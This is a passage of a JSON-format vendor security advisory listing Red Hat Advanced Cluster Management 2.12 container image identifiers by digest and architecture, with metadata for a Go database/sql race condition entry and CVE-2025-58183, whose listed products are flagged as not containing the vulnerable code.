"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-58183",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-10-29T23:01:50.573951+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
